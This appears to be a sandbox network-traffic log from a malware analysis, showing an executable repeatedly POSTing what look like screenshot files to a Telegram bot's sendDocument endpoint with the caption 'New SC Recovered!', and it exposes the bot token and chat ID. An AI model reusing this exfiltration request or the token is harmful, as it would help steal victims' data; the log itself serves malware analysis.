2024-07-25 22:02:08 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:02:08 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:02:08 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:02:08 UTC	7419	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:02:08 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 39 36 33 31 30 38 61 38 37 63 34 2d 2d 0d 0a Data Ascii: -----------------------------8dce963108a87c4--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49743	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:02:08 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcec75a72c3e04 Host: api.telegram.org Content-Length: 57558 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:02:09 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:02:09 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 63 37 35 61 37 32 63 33 65 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 63 37 35 61 37 32 63 33 65 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 31 34 2f 32 30 32 34 20 31 37 3a 31 38 3a 34 31 0a 55 73 65 72 Data Ascii: -----------------------------8dcec75a72c3e04Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcec75a72c3e04Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/14/2024 17:18:41User
2024-07-25 22:02:09 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:02:09 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:02:09 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:02:09 UTC	7419	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:02:09 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 63 37 35 61 37 32 63 33 65 30 34 2d 2d 0d 0a Data Ascii: -----------------------------8dcec75a72c3e04--
2024-07-25 22:02:09 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:02:09 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49744	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:02:11 UTC	238	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcef2136d34414 Host: api.telegram.org Content-Length: 57558 Expect: 100-continue
2024-07-25 22:02:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:02:12 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 32 31 33 36 64 33 34 34 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 32 31 33 36 64 33 34 34 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 31 38 2f 32 30 32 34 20 30 32 3a 35 31 3a 35 30 0a 55 73 65 72 Data Ascii: -----------------------------8dcef2136d34414Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcef2136d34414Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/18/2024 02:51:50User
2024-07-25 22:02:12 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:02:12 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:02:12 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:02:12 UTC	7419	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:02:12 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 32 31 33 36 64 33 34 34 31 34 2d 2d 0d 0a Data Ascii: -----------------------------8dcef2136d34414--
2024-07-25 22:02:12 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:02:12 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49745	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:02:15 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcf244c2bc1a24 Host: api.telegram.org Content-Length: 61460 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:02:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:02:16 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 32 34 34 63 32 62 63 31 61 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 32 34 34 63 32 62 63 31 61 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 32 32 2f 32 30 32 34 20 30 32 3a 34 33 3a 34 32 0a 55 73 65 72 Data Ascii: -----------------------------8dcf244c2bc1a24Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcf244c2bc1a24Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/22/2024 02:43:42User
2024-07-25 22:02:16 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:02:16 UTC	16355	OUT	Data Raw: eb 52 09 2e 13 d9 7f a9 a7 0b b0 89 80 79 35 42 79 4c b2 97 ed d0 57 99 92 61 e5 f5 8f 69 d1 23 cb e2 07 1a 78 75 07 bb 7f 91 1d 14 51 5f 60 7c 50 51 45 14 01 d8 dd dd 45 67 61 a5 5c ce db 63 8d 81 27 fe d8 bd 71 3a 86 ad 73 7b a9 fd b7 79 47 53 fb b0 0f dc 03 a6 2b a9 f1 1d bc f7 3e 19 b1 4b 78 64 95 c3 46 4a a2 96 38 d8 79 e2 b9 2f ec ad 4b fe 81 f7 5f f7 e5 bf c2 bc ec 1c 60 a1 cc f7 d8 f7 b1 92 9b 9f 2a db 73 a4 93 c5 13 98 ac 6f 10 0f 29 58 a5 cc 40 73 bb fc 08 c9 1f 43 5a f1 cd 1d c5 8e af 34 4c 1a 37 25 94 8e e3 c9 4a e1 d7 4e d5 11 59 45 85 d6 d7 18 23 c9 6e 7f 4a ea 3c 3f 6f 3d b7 85 ef d2 e2 19 22 62 64 21 5d 4a 9c 6c 1c f3 59 e2 69 53 84 2f 13 4c 35 5a 93 9d a4 73 94 52 d2 57 aa 7c e8 51 45 14 0c 2b a8 f0 7f fa ab af f7 97 fa d7 2f 5d 47 83 ff Data Ascii: R.y5ByLWai#xuQ_`\|PQEEga\c'q:s{yGS+>KxdFJ8y/K_`*so)X@sCZ4L7%JNYE#nJ<?o="bd!]JlYiS/L5ZsRW\|QE+/]G
